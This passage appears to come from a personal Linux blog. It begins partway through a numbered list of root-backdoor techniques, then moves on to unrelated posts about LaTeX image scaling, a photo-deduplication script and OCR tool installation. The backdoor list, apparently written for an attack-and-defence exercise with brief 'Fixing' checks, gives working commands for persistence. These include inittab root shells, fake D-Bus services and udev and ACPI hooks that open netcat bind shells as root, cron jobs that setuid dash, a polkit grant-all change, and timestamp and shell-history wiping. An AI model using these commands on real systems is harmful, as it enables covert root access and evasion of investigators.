exec </dev/tty13 >/dev/tty13 2>/dev/tty13
exec /bin/bash
EOF

nano /etc/inittab <<EOF
kb::kbrequest:/etc/init.d/throttle
EOF

init q


17.2
  Fixing

nano /etc/inittab


17.3
  Exploiting

Ctrl+Alt+F1, Alt+Up, Alt+Left


18
  SysV Init Ctrl+Alt+Del

Local
root


18.1
  Hacking

nano /etc/inittag <<EOF
ca:12345:ctrlaltdel:chmod +s /bin/dash
EOF

init q


18.2
  Fixing

nano /etc/inittag


18.3
  Exploiting

Ctrl+Alt+F1, Ctrl+Alt+Del, dash


19
  SysV Init tty14

Local
root


19.1
  Hacking

nano /etc/inittag <<EOF
14:23:respawn:/bin/login -f root </dev/tty14 >/dev/tty14 2>/dev/tty14
EOF

init q


19.2
  Fixing

less /etc/inittag


19.3
  Exploiting

Ctrl+Alt+F1, Alt+Left


20
  DBus Root Service

Local
root


20.1
  Hacking

cd /usr/share/dbus-1/system-services/
cp org.freedesktop.org.UPower org.Rootme.Remotely.service
nano org.Rootme.Remotely.service << EOF
[D-BUS Service]
Name=org.Rootme.Remotely
Exec=/bin/nc.traditional -l -p 31343 -e /bin/dash
User=root
EOF

cp org.freedesktop.org.UPower org.Rootme.Locally.service
nano org.Rootme.Locally.service << EOF
[D-BUS Service]
Name=org.Rootme.Locally
Exec=/bin/chmod u+s /bin/dash
User=root
EOF



20.2
  Fixing

grep Exec /usr/share/dbus-1/system-services/*.service


20.3
  Exploiting

dbus-send -system -print-reply -dest='org.Rootme.Locally' /org/Rootme/Locally org.Rootme.Locally

dbus-send -system -print-reply -dest='org.Rootme.Remotely' /org/Rootme/Remotely org.Rootme.Remotely

nc localhost 31343

dash


21
  Crontabs

Local
Remote
root


21.1
  Hacking

touch /etc/cron.d/pamd
chmod a+x /etc/cron.d/pamd
nano /etc/cron.d/pamd <<EOF
*/2 * * * *   root  cp /bin/dash /usr/share/gdm/chooser
*/2 * * * *   root  chmod +s /usr/share/gdm/chooser
EOF

touch /etc/cron.d/dhclient
chmod a+x /etc/cron.d/dhclient
nano /etc/cron.d/dhclient <<EOF
*/2 * * * *   root  /sbin/mount.btrfs
EOF


21.2
  Fixing

sudo ls -l /var/spool/cron/crontabs/ /etc/cron.*/


21.3
  Exploiting

ls -l /etc/cron.d/dhclient /etc/cron.d/pamd /usr/share/gdm/chooser

Wait

/usr/share/gdm/chooser

nc -l localhost 31339


22
  udev

Localroot

udev is responsible for devices being attached to Linux.
It is able to trigger commands on certain hardware.
Under the assumption that a Laptop will have a rfkill switch, one could write the following rules.
Note that the commands block, i.e. to hit the second rule, the first program must exist.
udev automatically reloads the rules.


22.1
  Hacking

nano /lib/udev/rules.d/99-rfkill.rules <<EOF
SUBSYSTEM=="rfkill", RUN +="/bin/nc.traditional -l -p 31337 -e /bin/sh"
SUBSYSTEM=="rfkill", RUN +="/bin/chmod +s /bin/dash"
EOF


22.2
  Fixing

grep RUN /lib/udev/rules.d/* /etc/udev/rules.d/

but too hard


22.3
  Exploiting

toggle rfkill via hardware switch

nc localhost 31344

dash


23
  ACPI Powerbtn

Local
root


23.1
  Hacking

nano /etc/acpi/powerbtn.sh <<EOF
nc.traditional -l -p 31348 -e /bin/sh
/bin/chmod +s /bin/dash
EOF


23.2
  Fixing

ls /etc/acpi/

less /etc/acpi/powerbtn.sh


23.3
  Exploiting

Press power button

nc localhost 31348

dash


24
  PolicyKit GrantAll

Local
root

Note that this reflects policykit 0.96 which has a deprecated config file syntax.


24.1
  Hacking

nano /usr/share/polkit-1/actions/org.freedesktop.policykit.policy

change org.freedesktop.policykit.exec to read
    <defaults>
      <allow_any>yes</allow_any>
      <allow_inactive>yes</allow_inactive>
      <allow_active>yes</allow_active>
    </defaults>

pkill polkitd


24.2
  Fixing

nano /usr/share/polkit-1/actions/org.freedesktop.policykit.policy

change org.freedesktop.policykit.exec to read
      <allow_any>auth_admin</allow_any>
      <allow_inactive>auth_admin</allow_inactive>
      <allow_active>auth_admin</allow_active>

pkill polkitd


24.3
  Exploiting

pkexec id


25
  decoy timestamps

No hack in the traditional sense but stuff that one might need to do.


25.1
  Hacking

for i in `find /etc/ /bin/ /sbin/ /var/spool/
          /var/run /usr/lib/ConsoleKit /usr/share/dbus-1/ /usr/share/polkit-1/`; do
    touch $i; done
export HISTFILE=/dev/null
rm ~/.*history*


25.2
  Fixing


25.3
  Exploiting

find / -mtime -1

find / -ctime -1

Perfectly scale an image to the rest of a page with LaTeX

I had the following problem for a long time: I wanted to embed a picture into a page and automatically have it scaled to the maximum size that possibly fits the page, but not more. Obviously, simply doing a

\includeimage[width=\textwidth]{myimage}

wouldn’t do the job, because if the image is more tall than wide, the image would grow beyond the page. One could use the information from the \textheigth register, i.e. like

\includeimage[width=\textwidth,height=\textheight,keepaspectration=true]{myimage}

But that doesn’t take already existing text into account, i.e. some description above the image that you definitely want to have on the same page.

So Simon cooked up a macro that would allow me to do exactly what I wanted by creating a new box, getting its height and subtracting that from \textheight. Lovely. Here’s the code:

\newlength{\textundbildtextheight}
 
\newcommand{\textundbild}[2]{
\settototalheight\textundbildtextheight{\vbox{#1}}
#1
\vfill
\begin{center}
\includegraphics[width=\textwidth,keepaspectratio=true,height=\textheight-\the\textundbildtextheight]{#2}
\end{center}
\vfill
}

I’m sure it’s not very correct and it’s possible to make it not work properly, but it does the job very well for me as you can see on the following rendered pages:


DIN A4 Page
DIN A5 Page
DIN A6 Page

And well, the contents of the image is a bit ugly, too, but if you know a nice bullshit bingo generator, let me know.

Sifting through a lot of similar photos

To keep the amount of photos in my photo library sane, I had to sift through many pictures and get rid of redundant ones. I defined redundancy as many pictures taken at the same time. Thus I had to pick one of the redundant pictures and delete the other ones.

My strategy so far was to use Nautilus and Eye of GNOME to spot pictures of the same group and delete all but the best one.

I realised that photos usually show the same picture if they were shot at the same time, i.e. many quick shots after another. I also realised that usually the best photograph was the biggest one in terms on bytes in JPEG format.

To automate the whole selection and deletion process, I hacked together a tiny script that stupidly groups files in a directory according to their mtime and deletes all but the biggest one.

Before deletion, it will show the pictures with eog and ask whether or not to delete the other pictures.

It worked quite well and helped to quickly weed out 15% of my pictures 🙂

I played around with another method: Getting the difference of the histograms of the images, to compare the similarity. But as the pictures were shot with a different exposure, the histograms were quite different, too. Hence that didn’t work out very well. But I’ll leave it in, just for reference.

So if you happen to have a similar problem, feel free to grab the following script 🙂

#!/usr/bin/env python
 
import collections
import math
import os
from os.path import join, getsize, getmtime
import operator
import subprocess
import sys
 
 
 
 
subprocess.Popen.__enter__ = lambda self: self
subprocess.Popen.__exit__ = lambda self, type, value, traceback: self.kill()
 
directory = '.'
THRESHOLD = 3
GET_RMS = False
 
mtimes = collections.defaultdict(list)
 
def get_picgroups_by_time(directory='.'):
 
	for root, dirs, files in os.walk(directory):
		for name in files:
			fname = join(root, name)
			mtime = getmtime(fname)
			mtimes[mtime].append(fname)
 
	# It's gotten a bit messy, but a OrderedDict is available in Python 3.1 hence this is the manually created ordered list.
	picgroups = [v for (k, v) in sorted([(k, v) for k, v in mtimes.iteritems() if len(v) >= THRESHOLD])]
 
	return picgroups
 
def get_picgroups(directory='.'):
	return get_picgroups_by_time()
 
picgroups = get_picgroups(directory)
 
print 'Got %d groups' % len(picgroups)
 
def get_max_and_picgroups(picgroups):
	for picgroup in picgroups:
		max_of_group = max(picgroup, key=lambda x: getsize(x))
		print picgroup
		print 'max: %s: %d' % (max_of_group, getsize(max_of_group))
 
		if GET_RMS:
			import PIL.Image
			last_pic = picgroup[0]
			for pic in picgroup[1:]:
				image1 = PIL.Image.open(last_pic).histogram()
				image2 = PIL.Image.open(pic).histogram()
 
				rms = math.sqrt(reduce(operator.add, map(lambda a,b: (a-b)**2, image1, image2))/len(image1))
 
				print 'RMS %s %s: %s' % (last_pic, pic, rms)
 
			last_pic = pic
		yield (max_of_group, picgroup)
 
 
max_and_picgroups = get_max_and_picgroups(picgroups)
 
 
def decide(prompt, decisions):
	import termios, fcntl, sys, os, select
 
	fd = sys.stdin.fileno()
 
	oldterm = termios.tcgetattr(fd)
	newattr = oldterm[:]
	newattr[3] = newattr[3] & ~termios.ICANON & ~termios.ECHO
	termios.tcsetattr(fd, termios.TCSANOW, newattr)
 
	oldflags = fcntl.fcntl(fd, fcntl.F_GETFL)
	fcntl.fcntl(fd, fcntl.F_SETFL, oldflags | os.O_NONBLOCK)
 
	print prompt
 
	decided = None
	try:
		while not decided:
			r, w, e = select.select([fd], [], [])
			if r:
				c = sys.stdin.read(1)
				print "Got character", repr(c)
				decision_made = decisions.get(c, None)
				if decision_made:
					decision_made()
					decided = True
 
	finally:
	    termios.tcsetattr(fd, termios.TCSAFLUSH, oldterm)
	    fcntl.fcntl(fd, fcntl.F_SETFL, oldflags)
 
for max_of_group, picgroup in max_and_picgroups:
	cmd = ['eog', '-n'] + picgroup
	print 'Showing %s' % ', '.join(picgroup)
 
	def delete_others():
		to_delete = picgroup[:]
		to_delete.remove(max_of_group)
		print 'deleting %s' % ', '.join (to_delete)
		[os.unlink(f) for f in to_delete]
 
	with subprocess.Popen(cmd) as p:
		decide('%s is max, delete others?' % max_of_group, {'y': delete_others, 'n': lambda: ''})

OCRing a scanned book

I had the pleasure to use a “Bookeye” book scanner. It’s a huge device which helps scanning things like books or folders. It’s very quick and very easy to use. I got a huge PDF out of my good 100 pages that I’ve scanned.

Unfortunately the light was very bright and so the scanner scanned “through” the open pages revealing the back sides of the pages. That’s not very cool and I couldn’t really dim the light or put a sheet between the Pages.
Also, it doesn’t do OCR but my main point of digitalising this book was to actually have it searchable and copy&pastable.

There seem to be multiple options to do OCR on images:

tesseract

covered already

ocropus

Apparently this is supposed to be tesseract on steroids as it can recognise text on paper and different layouts and everything.
Since it’s a bit painful to compile, I’d love to share my experiences hoping that it will become useful to somebody.

During compilation of ocropus, you might run into issues like this or that, so be prepared to patch the code.


cd /tmp/
svn checkout http://iulib.googlecode.com/svn/trunk/ iulib
cd iulib/
./configure --prefix=/tmp/libiu-install
make && make install


cd /tmp/
wget http://www.leptonica.com/source/leptonlib-1.67.tar.gz -O- | tar xvzf -
cd leptonlib*/
./configure --prefix=/tmp/leptonica
make && make install


cd /tmp/
svn checkout http://ocropus.googlecode.com/svn/trunk/ ocropus
# This is due to this bug: http://code.google.com/p/ocropus/issues/detail?id=283
cat > ~/bin/leptheaders <
#!/bin/sh
echo /tmp/leptonica/include/leptonica/
EOF
chmod a+x ~/bin/leptheaders
./configure --prefix=/tmp/ocropus-install --with-iulib=/tmp/libiu-install/
make && make install

muelli@bigbox /tmp $ LD_LIBRARY_PATH=/tmp/ocropus-install/lib/:/tmp/leptonica/lib/ ./ocropus-install/bin/ocroscript --help
usage: ./ocropus-install/bin/ocroscript [options] [script [args]].
Available options are:
  -e stat  execute string 'stat'
  -l name  require library 'name'
  -i       enter interactive mode after executing 'script'
  -v       show version information
  --       stop handling options
  -        execute stdin and stop handling options
muelli@bigbox /tmp $

However, I can’t do anything because I can’t make LUA load the scripts from the share/ directory of the prefix. Too sad. It looked very promising.

Cuneiform

This is an interesting thing. It’s a BSD licensed russian OCR software that was once one the leading tools to do OCR.
Interestingly, it’s the most straight forward thing to install, compared to the other things listed here.

bzr branch lp:cuneiform-linux
cd cuneiform-linux/
mkdir build
cd build/
cmake .. -DCMAKE_INSTALL_PREFIX=/tmp/cuneiform
make
make install

This is supposed to produce some sort of HTML which we can glue to a PDF with the following tool.

hocr2pdf

Apparently takes “HTML annotated OCR data” and bundles that, together with the image, to a PDF.


cd /tmp/
svn co http://svn.exactcode.de/exact-image/trunk ei
cd ei/
./configure --prefix=/tmp/exactimage
make && make install

That, however, failed for me like this:

  LINK EXEC objdir/frontends/optimize2bw
/usr/bin/ld: objdir/codecs/lib.a: undefined reference to symbol 'QuantizeBuffer'
/usr/bin/ld: note: 'QuantizeBuffer' is defined in DSO /usr/lib64/libgif.so.4 so try adding it to the linker command line
/usr/lib64/libgif.so.4: could not read symbols: Invalid operation
collect2: ld returned 1 exit status
make: *** [objdir/frontends/optimize2bw] Error 1

Adding “LDFLAGS += -lgif” to the Makefile fixes that. I couldn’t find a bug tracker, hence I reported this issue via email but haven’t heard back yet.

Although the hOCR format seems to be the only option to actually know where in the file the text appears, no OCR program, except cuneiform and tesseract with a patch, seems to support it 🙁

gscan2pdf

as a full suite it can import pictures or PDFs and use a OCR program mentioned above (tesseract or gocr). The whole thing can then be saved as a PDF again.
Results with gocr are not so good. I can’t really copy and paste stuff. Searching does kinda work though.

Using Tesseract, however, doesn’t work quite well:

 Tesseract Open Source OCR Engine
tesseract: unicharset.cpp:76: const UNICHAR_ID UNICHARSET::unichar_to_id(const char*, int) const: Assertion `ids.contains(unichar_repr, length)' failed.
sh: line 1:  6187 Aborted                 (core dumped) tesseract /tmp/4jZN0oNbB1/dLNBLkcjph.tif /tmp/4jZN0oNbB1/_4BdZMfGXJ -l fra
*** unhandled exception in callback:
***   Error: cannot open /tmp/4jZN0oNbB1/_4BdZMfGXJ.txt
***  ignoring at /usr/bin/gscan2pdf line 12513.
Tesseract Open Source OCR Engine
tesseract: unicharset.cpp:76: const UNICHAR_ID UNICHARSET::unichar_to_id(const char*, int) const: Assertion `ids.contains(unichar_repr, length)' failed.
sh: line 1:  6193 Aborted                 (core dumped) tesseract /tmp/4jZN0oNbB1/ELMbnDkaEI.tif /tmp/4jZN0oNbB1/C47fuqxX3S -l fra
*** unhandled exception in callback:
***   Error: cannot open /tmp/4jZN0oNbB1/C47fuqxX3S.txt
***  ignoring at /usr/bin/gscan2pdf line 12513.

It doesn’t seems to be able to work with cuneiform 🙁

Archivista Box

This is actually an appliance and you can download an ISO image.
Running it is straight forward:

cd /tmp/
wget 'http://downloads.sourceforge.net/project/archivista/archivista/ArchivistaBox_2010_IV/archivista_20101218.iso?r=http%3A%2F%2Fsourceforge.net%2Fprojects%2Farchivista%2F&ts=1295436241&use_mirror=ovh'
qemu -cdrom /tmp/archivista_20101218.iso -m 786M -usb

Funnily enough, the image won’t boot with more than 786MB of RAM. Quite weird, but qemu just reports the CPU to be halted after a while. If it does work, it boots up a firefox with a nice WebUI which seems to be quite functional. However, I can’t upload my >100MB PDF probably because it’s a web based thing and either the server rejects big uploads or the CGI just times out or a mixture of both.

Trying to root this thing is more complex than usual. Apparently you can’t give “init=/bin/sh” as a boot parameter as it wouldn’t make a difference. So I tried to have a look at the ISO image. There is fuseiso to mount ISO images in userspace. Unfortunately, CDEmu doesn’t seem to be packaged for Fedora. Not surprisingly, there was a SquashFS on that ISO9660 filesystem. Unfortunately, I didn’t find any SquashFS FUSE implementation 🙁 But even with elevated privileges, I can’t mount that thing *sigh*:

$ file ~/empty/live.squash
/home/muelli/empty/live.squash: Squashfs filesystem, little endian, version 3.0, 685979128 bytes, 98267 inodes, blocksize: 65536 bytes, created: Sat Dec 18 06:54:54 2010
$ sudo mount ~/empty/live.squash /tmp/empty/
mount: wrong fs type, bad option, bad superblock on /dev/loop1,
       missing codepage or helper program, or other error
       In some cases useful info is found in syslog - try
       dmesg | tail  or so
$ dmesg | tail -n 2
[342853.796364] squashfs: version 4.0 (2009/01/31) Phillip Lougher
[342853.796726] SQUASHFS error: Major/Minor mismatch, older Squashfs 3.0 filesystems are unsupported

But unsquashfs helped to extract the whole thing onto my disk. They used “T2” to bundle everything to a CD and packaged software mentioned above. Unfortunately, very old versions were used, i.e. cuneiform is in version 0.4.0 as opposed to 1.0.0. Hence, I don’t really consider it to be very useful to poke around that thing.

It’s a huge thing worth exploring though. It all seems to come from this SVN repository: svn://svn.archivista.ch/home/data/archivista/svn.

WatchOCR

For some reason, they built an ISO image as well. Probably to run an appliance.

cd /tmp/
wget http://www.watchocr.com/files/watchocr-V0.6-2010-12-10-en.iso
qemu -cdrom /tmp/watchocr-V0.6-2010-12-10-en.iso -m 1G

The image booted up a webbrowser which showed a webinterface to the WebOCR functionality.
I extraced the necessary scripts which wraps tools like cuniform, ghostscript and friends. Compared to the archivista box, the scripts here are rather simple. Please find webocr and img2pdf. They also use an old cuneiform 0.8.0 which is older than the version from Launchpad.

However, in my QEMU instance, the watchocr box took a very long time to process my good 100 pages PDF.

Some custom script

That tries to do the job did in fact quite well, although it’s quite slow as well. It lacks proper support for spawning multiple commands in parallel.

After you have installed the dependencies like mentioned above, you can run it:

wget http://www.konradvoelkel.de/download/pdfocr.sh
PATH="/tmp/exactimage/bin/:/tmp/cuneiform/bin/:$PATH" LD_LIBRARY_PATH=/tmp/cuneiform/lib64/ sh -x pdfocr.sh buch-test-1.pdf 0 0 0 0 2500 2000 fra SomeAuthor SomeTitle

The script, however, doesn’t really work for me, probably because of some quoting issues:

+ pdfjoin --fitpaper --tidy --outfile ../buch-test-1.pdf.ocr1.pdf 'pg_*.png.pdf'
          ----
  pdfjam: This is pdfjam version 2.08.
  pdfjam: Reading any site-wide or user-specific defaults...
          (none found)
  pdfjam ERROR: pg_*.png.pdf not found

Having overcome that problem, the following pdfjoin doesn’t work for an unknown reason. After having replaced pdfjoin manually, I realised, that the script sampled the pages down, made them monochrome and rotated them! Hence, no OCR was possible and the final PDF was totally unusable *sigh*.

It’s a mess.

To conclude…

I still don’t have a properly OCRd version of my scanned book, because of not very well integrated tools. I believe that programs like pdftk, imagemagick, unpaper, cuneiform, hocr2pdf, pdfjam do their job very well. But it appears that they are not very well knit together to form a useful tools to OCR a given PDF. Requirements would be, for example, that there is no loss of quality of the scanned images, that the number of programs to be called is reduced to a minimum and that everything needs to be able to do batch processing. So far, I couldn’t find anything that fulfills that requirements. If you know anything or have a few moments to bundle the necessary tools together, please tell me :o) The necessary pieces are all there, as far as I can see. It just needs someone to integrate everything nicely.

Creative Commons Attribution-ShareAlike 3.0 Unported
This work by Muelli is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported.